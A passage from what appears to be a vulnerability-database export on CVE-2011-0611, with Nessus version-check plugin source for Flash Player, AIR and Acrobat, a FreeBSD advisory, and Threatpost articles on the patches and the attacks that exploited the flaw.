script_name(english:\"Flash Player < 10.2.159.1 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)\");\n script_summary(english:\"Checks version of Flash Player\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a browser plug-in that allows\narbitrary code execution.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of Adobe Flash Player\nearlier than 10.2.159.1. Such versions are reportedly affected by a\nmemory corruption vulnerability. 
\n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.\" );\n \n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ee82b34\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-07.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Flash Player 10.2.159.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value: \"2011/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n \n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, 
Inc.\");\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/Flash_Player/installed');\n\n# Identify vulnerable versions.\ninfo = '';\n\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\"Plugin\" >< variant || \"ActiveX\" >< variant) && (\n iver[0] < 10 ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 2 ||\n (\n iver[1] == 2 &&\n (\n iver[2] < 159 ||\n (iver[2] == 159 && iver[3] < 1)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 10.2.159.1\\n';\n }\n # Chrome\n else if (\n (\"Chrome\" >< variant) && (\n iver[0] < 10 ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 2 ||\n (\n iver[1] == 2 &&\n (\n iver[2] < 154 ||\n (iver[2] == 154 && iver[3] < 27)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n info += '\\n Product: Browser Plugin (for Google Chrome)';\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver ;\n info += '\\n Fixed version : 10.2.154.27 (as included with Google Chrome 10.0.648.205)\\n';\n }\n }\n }\n } 
\n}\n\nif (info)\n{\n if (report_verbosity > 0) security_hole(port:get_kb_item(\"SMB/transport\"), extra:info);\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:15:40", "description": "The remote Windows host contains a version of Adobe AIR earlier than\n2.6.0.19140. Such versions are reportedly affected by a memory\ncorruption vulnerability. \n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.", "edition": 27, "published": "2011-04-18T00:00:00", "title": "Adobe AIR < 2.6.0.19140 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB11-07.NASL", "href": "https://www.tenable.com/plugins/nessus/53474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53474);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_xref(name:\"CERT\", value:\"230057\");\n script_xref(name:\"Secunia\", value:\"44119\");\n\n script_name(english:\"Adobe AIR < 2.6.0.19140 ActionScript Predefined Class Prototype Addition Remote Code Execution (APSB11-07)\");\n script_summary(english:\"Checks version of Adobe AIR\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host contains a version of Adobe AIR that 
allows\narbitrary code execution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host contains a version of Adobe AIR earlier than\n2.6.0.19140. Such versions are reportedly affected by a memory\ncorruption vulnerability. \n\nBy tricking a user on the affected system into opening a specially\ncrafted document with Flash content, such as a SWF file embedded in a\nMicrosoft Word document, an attacker can potentially leverage this\nissue to execute arbitrary code remotely on the system subject to the\nuser's privileges. \n\nNote that there are reports that this issue is being exploited in the\nwild as of April 2011.\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?9ee82b34\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www.adobe.com/support/security/bulletins/apsb11-07.html\");\n script_set_attribute(attribute:\"solution\",value:\"Upgrade to Adobe AIR 2.6.0.19140 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value: \"2011/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2011/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\nfix = '2.6.0.19140';\nfix_ui = '2.6';\n\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n exit(0);\n}\nelse exit(0, \"The host is not affected since Adobe AIR \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:14:47", "description": "The remote Windows host contains a version of Adobe Acrobat 9.x <\n9.4.4 or 10.x < 10.0.3. 
Such versions are affected by multiple memory\ncorruption vulnerabilities.\n\nA remote attacker could exploit this by tricking a user into viewing a\nmalicious crafted PDF file, resulting in arbitrary code execution.\n\nNote also, CVE-2011-0611 is being exploited in the wild as of April\n2011.", "edition": 27, "published": "2011-04-15T00:00:00", "title": "Adobe Acrobat 9.x / 10.x Multiple Vulnerabilities (APSB11-08)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0610", "CVE-2011-0611"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSA11-02.NASL", "href": "https://www.tenable.com/plugins/nessus/53450", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(53450);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2011-0610\", \"CVE-2011-0611\");\n script_bugtraq_id(47314, 47531);\n script_xref(name:\"CERT\", value:\"230057\");\n script_xref(name:\"Secunia\", value:\"44149\");\n\n script_name(english:\"Adobe Acrobat 9.x / 10.x Multiple Vulnerabilities (APSB11-08)\");\n script_summary(english:\"Checks version of Adobe Acrobat and authplay.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\nmultiple memory corruption vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of Adobe Acrobat 9.x <\n9.4.4 or 10.x < 10.0.3. 
Such versions are affected by multiple memory\ncorruption vulnerabilities.\n\nA remote attacker could exploit this by tricking a user into viewing a\nmalicious crafted PDF file, resulting in arbitrary code execution.\n\nNote also, CVE-2011-0611 is being exploited in the wild as of April\n2011.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ee82b34\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-08.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 9.4.4 / 10.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network 
Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\npath = get_kb_item_or_exit(\"SMB/Acrobat/Path\");\n\nversion_ui = get_kb_item(\"SMB/Acrobat/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\nreport = '';\n# This affects 9.x < 9.4.4 / 10.x < 10.0.3\nif (\n # 9.x\n (\n (ver[0] == 9 && ver[1] < 4) ||\n (ver[0] == 9 && ver[1] == 4 && ver[2] < 4)\n )\n)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : 9.4.4 / 10.0.3\\n';\n}\nelse if (ver[0] == 10 && ver[1] == 0 &&\n (ver[2] < 1 || (ver[2] == 1 && ver[3] <= 434)))\n{\n path = get_kb_item_or_exit('SMB/Acrobat/Path');\n name = kb_smb_name();\n #port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n #if (!get_port_state(port)) exit(0, \"Port \"+port+\" is not open.\");\n #soc = open_sock_tcp(port);\n #if (!soc) exit(1, \"Failed to open a socket on port \"+port+\".\");\n\n #session_init(socket:soc, hostname:name);\n if(!smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n\n\n share = ereg_replace(pattern:'^([A-Za-z]):.*', replace:'\\\\1$', string:path);\n dll = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:'\\\\1\\\\Acrobat\\\\authplay.dll', string:path);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n exit(1, 'Can\\'t connect to '+share+' share.');\n }\n\n fh = CreateFile(\n file:dll,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n 
share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n if (isnull(fh))\n {\n NetUseDel();\n exit(1, 'Unable to access : '+path+'\\\\Acrobat\\\\authplay.dll.');\n }\n dllver = GetProductVersion(handle:fh);\n dllver = split(dllver, sep:',', keep:FALSE);\n\n CloseFile(handle:fh);\n NetUseDel();\n if (isnull(dllver)) exit(1, 'Can\\'t get the version of '+path+'\\\\Acrobat\\\\authplay.dll.');\n\n dllversion = join(sep:'.', dllver);\n fixdll = '10.2.159.1';\n if (ver_compare(ver:dllversion, fix:fixdll) == -1)\n {\n report =\n '\\n DLL : ' + path + '\\\\Acrobat\\\\authplay.dll' +\n '\\n Installed version : ' + dllversion +\n '\\n Fixed version : ' + fixdll + '\\n';\n }\n}\nif (report)\n{\n if (report_verbosity > 0) security_hole(port:get_kb_item('SMB/transport'), extra:report);\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected.\");\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:59", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0611"], "description": "\nAdobe Product Security Incident Response Team reports:\n\nA critical vulnerability exists in Flash Player 10.2.153.1\n\t and earlier versions (Adobe Flash Player 10.2.154.25 and\n\t earlier for Chrome users) for Windows, Macintosh, Linux\n\t and Solaris, Adobe Flash Player 10.2.156.12 and earlier\n\t versions for Android, and the Authplay.dll component that\n\t ships with Adobe Reader and Acrobat X (10.0.2) and earlier\n\t 10.x and 9.x versions for Windows and Macintosh operating\n\t systems.\nThis vulnerability (CVE-2011-0611) could cause a crash\n\t and potentially allow an attacker to take control of the\n\t affected system. 
There are reports that this vulnerability\n\t is being exploited in the wild in targeted attacks via a\n\t malicious Web page or a Flash (.swf) file embedded in a\n\t Microsoft Word (.doc) or Microsoft Excel (.xls) file\n\t delivered as an email attachment, targeting the Windows\n\t platform. At this time, Adobe is not aware of any attacks\n\t via PDF targeting Adobe Reader and Acrobat. Adobe Reader\n\t X Protected Mode mitigations would prevent an exploit of\n\t this kind from executing.\n\n", "edition": 4, "modified": "2011-01-20T00:00:00", "published": "2011-01-20T00:00:00", "id": "32B05547-6913-11E0-BDC4-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html", "title": "linux-flashplugin -- remote code execution vulnerability", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:05:44", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "[](<https://threatpost.com/adobe-releases-patch-flash-zero-day-hole-reader-acrobat-042111/>)Adobe has released patches for its Reader and Acrobat products to plug a hole in the Flash Player that was first reported in March and is being used in attacks on the Internet.\n\nThe company issued a security update on Thursday, [APSB11-08](<http://blogs.adobe.com/psirt/2011/04/security-updates-available-for-adobe-reader-and-acrobat-apsb11-08.html>), that repairs critical vulnerabilities in current versions of Adobe Reader and Acrobat X for Windows. Adobe warned that the vulnerability, CVE-2011-0611, is being actively exploited in the wild against both Adobe Flash Player, Reader and Acrobat and in a Flash file embedded in other files such as Microsoft Word and Excel documents. The hole allowed remote attackers to run arbitrary code on vulnerable machines. 
\n\nThe updates address a critical vulnerability that first [came to light on March 14](<https://threatpost.com/adobe-warns-attacks-critical-flash-player-bug-031411/>). The company pushed out a critical patch for Flash Player, Reader and Acrobat a week later. Adobe released a security bulletin addressing the issue on April 11 and a Flash Player for Google\u2019s Chrome Web browser and the Windows, Apple Macintosh, Linux and Solaris operating systems on April 14 and 15. The company had [originally targeted the Reader and Acrobat fixes for April 25](<https://threatpost.com/adobe-patch-flash-zero-day-windows-mac-friday-041411/>), but delivered them on the 21st, instead. \n\nThe patches are for Flash Player 10.2.153.1 and earlier for versions of Windows, Mac, Linux and Solaris, 10.2.154.25 and earlier for Chrome and 10.2.156.12 and earlier for Android. The patches also update authplay.dll, a component that ships with Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Mac, and Adobe AIR 2.6.19120 and earlier for Windows, Mac and Linux, Adobe said in a blog post on its support Web site. 
The company strongly encouraged users to apply the patch for the vulnerability, which it rates \u201cCritical.\u201d \n", "modified": "2013-04-17T16:34:43", "published": "2011-04-21T20:11:41", "id": "THREATPOST:D88693546B31883668AC9C41021BDA5B", "href": "https://threatpost.com/adobe-releases-patch-flash-zero-day-hole-reader-acrobat-042111/75154/", "type": "threatpost", "title": "Adobe Releases Patch for Flash Zero Day Hole in Reader, Acrobat", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "[](<https://threatpost.com/analysis-new-adobe-flash-attacks-041311/>)When Adobe warned customers earlier this week about a [newly discovered vulnerability in the Flash Player](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>) software, company officials said that there were already attacks underway against the bug. Those attacks are using malicious Flash files buried in Word documents and Microsoft\u2019s security engineers have analyzed the exploits and found some interesting details.\n\nThis is the second serious Flash vulnerability in recent weeks that attackers have targeted through the use of malicious Office files. In a previous round of attacks, hackers were going after an earlier Flash zero day with rigged Excel files. This time, Microsoft officials said, not only is the bug different, but so is the attack. Though both attacks use malicious Office files to trick users, the details are dissimilar.\n\nThe attack presents to the user via a spam message, often with a subject line referencing the Fukushima nuclear disaster, and carrying a malicious Word document as an attachment. \n\n\u201cOnce a user opens the document, Flash Player will load the malicious \nfile and exploitation will occur. 
Unlike the previous vulnerability, a \nbug in the ActionScript Virtual Machine version 1 is now used in the \nexploitation process. Another difference is that this is not a result of \nfuzzing clean files. We won\u2019t disclose any detail on what triggers the \nvulnerability, for security reasons, obviously,\u201d Marian Radu, Daniel Radu and Jaime Wong of the Microsoft Malware Protection Center wrote in an [analysis of the Flash exploit](<http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx>) attempts. \n\n\u201cIn order to exploit this vulnerability the attackers packaged the \nAVM1 code inside an AVM2 based Flash file. The latter is embedded inside \nthe Word document and assigned with setting up the exploitation \nenvironment. Initially the AVM2 code constructs a heap-spray buffer made of a NOP-sled.\u201d\n\nThe next step is the construction of the shellcode, which in turn then loads the Flash exploit code inside the Flash Player.\n\n\u201cThe AVM1 code that triggers this vulnerability is loaded as a separate \nSWF file, converted from a hex-encoded embedded string and executed,\u201d the researchers said.\n\nThe shellcode performs some other tasks, as well, including installing a benign Word document on the compromised machine as a way of hiding the original malicious file. 
\n\nThis attack method is essentially the one that the [attackers used to compromise RSA](<https://threatpost.com/rsa-securid-attack-was-phishing-excel-spreadsheet-040111/>) last month and steal some data related to the company\u2019s SecurID product line.\n", "modified": "2013-04-17T16:34:45", "published": "2011-04-13T16:13:42", "id": "THREATPOST:CA3146FC939402FCEA258087D3508FFB", "href": "https://threatpost.com/analysis-new-adobe-flash-attacks-041311/75131/", "type": "threatpost", "title": "Analysis of the New Adobe Flash Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:48", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "[](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>)Adobe on Monday warned its customers about a new unpatched vulnerability in its Flash Player application. Officials say that the bug is being used in targeted attacks involving a malicious Flash file embedded in a Microsoft Word document.\n\nThe Flash vulnerability affects users on Windows, Apple OS X, Linux and Solaris, as well as customers who use Flash on the Android platform. Adobe security officials said that the vulnerability\u2013which is in Flash 10.2.153.1 and earlier versions\u2013is being exploited by attackers right now through the use of rigged Flash files buried in Word documents. \n\n\u201cThis vulnerability (CVE-2011-0611) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via a Flash (.swf) file embedded in a Microsoft Word (.doc) file delivered as an email attachment, targeting the Windows platform. 
At this time, Adobe is not aware of any attacks via PDF targeting Adobe Reader and Acrobat.\u201d Adobe officials said in their [security bulletin on Flash](<http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html>).\n\nThe Flash bug also affects Adobe Reader and Acrobat, however the sandbox in Adobe Reader X can help prevent exploitation of the vulnerability. Adobe said that they are still in the process of figuring out the patch schedule for Flash and Acrobat. The company plans to patch Reader X in its next scheduled quarterly update, scheduled for June 14. \n\nThe news of the latest Flash vulnerability comes about 10 days after officials at RSA acknowledged that the [attack that compromised that company\u2019s SecurID product](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>) line last month used an Excel spreadsheet that included a malicious Flash file.\n", "modified": "2013-04-17T16:34:45", "published": "2011-04-12T11:51:03", "id": "THREATPOST:E1674DBE48ED411E7EF48579A10BCF26", "href": "https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/75126/", "type": "threatpost", "title": "Adobe Flash Bug Being Used in Attacks Via Word Documents", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:44", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611", "CVE-2012-1889"], "description": "A five-year campaign primarily focused on extracting sensitive information from Japanese oil, gas, and electric utilities was outlined by researchers on Tuesday.\n\nReferred to as [Operation Dust Storm](<https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf?t=1456276906648>) (.PDF) by researchers at Cylance, the campaign has managed to stay persistent over the years, and especially lately, by using dynamic DNS domains and customized 
backdoors.\n\nWhile the group has recently narrowed its sights on Japan, it\u2019s also attacked industries in South Korea, the United States, and Europe, the firm claims.\n\nActivity surrounding the campaign really picked up steam in 2015 when a handful of backdoors with hardcoded proxy addresses and credentials surfaced. Researchers traced those addresses back and noticed a slew of corporations across the oil, natural gas, construction, and transportation sector had been compromised.\n\n> New SPEAR research: Extended campaign against Japanese critical infrastructure: <https://t.co/jq8fwhObyQ> [#opduststorm](<https://twitter.com/hashtag/opduststorm?src=hash>) [pic.twitter.com/kG4X6hmJiG](<https://t.co/kG4X6hmJiG>)\n> \n> \u2014 Cylance, Inc. (@cylanceinc) [February 23, 2016](<https://twitter.com/cylanceinc/status/702149003945709568>)\n\nThere was a wave of attacks that year, including a major Japanese automaker in February, and a Japanese subsidiary of a South Korean electric utility and other critical infrastructure outfits in July and October.\n\nThe campaign also began using custom Android backdoors in 2015 \u2013 at first the Trojan forwarded SMS messages, and later in the year, specific files, from infected devices to C&C servers.\n\nLike many groups in the early 2010s, early iterations of the Dust Storm\u2019s activity revolved around zero days in Internet Explorer and Flash.\n\nFor example, in 2011 the attackers used an IE 8 vulnerability to infiltrate networks. They were also seen sending victims spear phishing emails with Word documents rigged with a zero day Flash exploit, CVE-2011-0611. According to Cylance, in 2012 the attackers used the same Flash exploit, coupled with another IE exploit, CVE-2012-1889, to hit victims.\n\nIn addition to the IE and Flash vulnerabilities, the group relied mostly on phishing attacks in its infancy . 
In 2011 it tried to siphon up Yahoo and Windows Live credentials through domains it set up and later that year capitalized on the Libyan crisis with emails about Muammar Gaddafi it sent to US government and defense targets.\n\nWhile the backdoor dropped through these exploits made headlines years ago, Cylance claims that reports around the group have mostly dissipated since.\n\nIt was Dust Storm\u2019s foray into duplicitous backdoors and proxies targeting Japanese resources that prompted researchers to investigate it in earnest last year.\n\n\u201cAs the group became more and more focused on Japan, less and less of their tactics and malware appeared in reports or write-ups. The targets identified escalated both in size and in the scope of affected industries,\u201d the report, penned by the firm\u2019s Director of Threat Intelligence Jon Gross, reads.\n\nWhile the Android Trojans only hit victims in Japan and South Korea, Gross acknowledges that the campaign around the attacks was \u201cmassive in comparison to previous operations,\u201d boasting over 200 domains.\n\nOfficials with SPEAR, Cylance\u2019s research division, make a point to say that they don\u2019t believe the Dust Storm attacks are intended to be destructive, but that they may be part of a long con, with their goals most likely \u201creconnaissance and long-term espionage.\u201d\n\nWhile the attacks are ongoing, the researchers, who worked with the Japanese Computer Emergency Response Team (JP-CERT) to investigate the group, say the reason they published their research was to hopefully stunt the group\u2019s progress.\n\nCylance doesn\u2019t directly attribute any group of individuals to the Dust Storm attacks but does hint that from March 2013 to August 2013 it observed a \u201cremarkable decrease\u201d in the amount of malware it was able to gather surrounding the campaign. 
It acknowledges that Mandiant\u2019s APT 1 report, which was published in February of that year, follows more or less the same timeline, however.\n\nIn that report Mandiant outlined a series of cyber espionage campaigns carried out over the course of several years on a broad palette of victims by a Chinese threat organization, APT1.\n", "modified": "2016-03-03T00:39:24", "published": "2016-02-24T14:11:04", "id": "THREATPOST:684A9363491231773FDB7BA1EBA2B6C0", "href": "https://threatpost.com/five-year-dust-storm-apt-campaign-targets-japanese-critical-infrastructure/116436/", "type": "threatpost", "title": "Five-Year 'Dust Storm' APT Campaign Seen Targeting Japanese Critical Infrastructure", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:41", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611", "CVE-2011-2110"], "description": "Attention given to previously unknown or \u201czero day\u201d flaws may be overrated, according to research from Microsoft Corp. \n\nIn an analysis, \u201cZeroing in on Malware Propagation Methods,\u201d Microsoft follows the propagation of malware and how certain forms measure up against other vulnerability exploits. Microsoft examined infections reported by their [Malicious Software Removal Tool](<http://www.microsoft.com/security/pc-security/malware-removal.aspx>) (MSRT), given the tool\u2019s range and its connection to Windows/Microsoft Update.\n\nWhile the intent of Microsoft\u2019s report isn\u2019t to downplay Zero Day exploits, the company does suggest the attention they get is overblown.\n\nLess than 1 percent of the infections reported came from zero-day vulnerabilities, 0.12 percent to be exact. 
